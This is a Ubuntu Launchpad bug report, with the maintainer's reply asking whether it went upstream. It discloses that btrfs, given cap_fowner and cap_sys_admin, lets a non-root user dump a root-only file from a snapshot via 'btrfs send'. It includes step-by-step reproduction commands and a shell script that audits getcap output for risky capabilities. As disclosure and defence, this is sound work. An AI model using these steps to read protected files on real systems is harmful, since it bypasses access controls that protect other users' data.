Hi,
Have you reported this issue to the upstream developers?
Thanks!
** Changed in: linux-signed (Ubuntu)
Status: New => Incomplete
--
https://bugs.launchpad.net/bugs/1785687
Title:
btrfs send can bypass DAC check with certain capability set
Status in linux package in Ubuntu:
Incomplete
Bug description:
Expected:
For the btrfs tool with certain capabilities set (cap_fowner, cap_sys_admin),
the DAC check should not be bypassed when operating on a subvol snapshot.
What happened instead:
The btrfs tool with certain capabilities (cap_fowner, cap_sys_admin) set can be
used to bypass the DAC check on a snapshot and gain read access to all files
in a snapshot.
Steps to reproduce:
As root:
# dd if=/dev/zero of=/tmp/test.disk bs=1M count=128
# mkfs.btrfs /tmp/test.disk
# mkdir -p /mnt/test
# mount /tmp/test.disk /mnt/test/
# cd /mnt/test
# btrfs subvol create snapshot
# echo "this is a secret" > snapshot/1.secret
# chmod 600 snapshot/1.secret
# btrfs subvol snapshot -r snapshot snapshot-ro
# setcap cap_fowner,cap_sys_admin+eip /bin/btrfs
As non-root:
$ cd /mnt/test
$ cat snapshot-ro/1.secret
cat: snapshot-ro/1.secret: Permission denied
$ btrfs send snapshot-ro > /tmp/snap
$ strings /tmp/snap
this is a secret
ProblemType: Bug
DistroRelease: Ubuntu 18.04
Package: linux-image-4.15.0-23-generic 4.15.0-23.25
ProcVersionSignature: Ubuntu 4.15.0-23.25-generic 4.15.18
Uname: Linux 4.15.0-23-generic x86_64
ApportVersion: 2.20.9-0ubuntu7
Architecture: amd64
CurrentDesktop: ubuntu:GNOME
Date: Mon Aug 6 11:18:18 2018
InstallationDate: Installed on 2018-05-17 (80 days ago)
InstallationMedia: Ubuntu 14.04.5 LTS "Trusty Tahr" - Release amd64 (20160803)
SourcePackage: linux-signed
UpgradeStatus: No upgrade log present (probably fresh install)
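An audit for the precondition in the reproduction steps above (an added example, not part of the original bug report): it scans `getcap -r` output for binaries that have been granted cap_sys_admin or cap_fowner as file capabilities. The sample lines are constructed, paths are assumed to contain no whitespace, and /usr/local/bin/backup-helper is a hypothetical name.

```shell
#!/bin/sh
# Added example: flag files whose capability sets include cap_sys_admin or
# cap_fowner, the two capabilities granted to /bin/btrfs in the report.
# Real use: getcap -r / 2>/dev/null | flag_risky_caps

# Reads getcap output on stdin, prints "path<TAB>caps" for each flagged file.
# Handles both output styles: "path = caps+eip" (older libcap, as shipped
# with Ubuntu 18.04) and "path caps=eip" (newer libcap).
# Assumption: paths contain no whitespace.
flag_risky_caps() {
    while read -r path rest; do
        [ -n "$path" ] || continue
        caps=${rest#= }                 # drop the older " = " separator
        for clause in $caps; do         # one clause per flag combination
            names=${clause%%[+=]*}      # capability names before +/= flags
            case ",$names," in
                *,cap_sys_admin,*|*,cap_fowner,*|,,)
                    # ",," is a clause with no names, e.g. "=ep": every
                    # capability is raised, so it is flagged as well.
                    printf '%s\t%s\n' "$path" "$caps"
                    break ;;
            esac
        done
    done
}

# Constructed sample input; not captured from a real system.
sample_getcap_output() {
    cat <<'EOF'
/bin/btrfs = cap_fowner,cap_sys_admin+eip
/usr/bin/ping cap_net_raw=ep
/usr/local/bin/backup-helper cap_dac_read_search+ep cap_sys_admin+i
/usr/bin/mtr-packet = cap_net_raw+ep
EOF
}

sample_getcap_output | flag_risky_caps
```

Any binary this flags that is executable by unprivileged users deserves review, since whatever privileged operations it implements become available to those users.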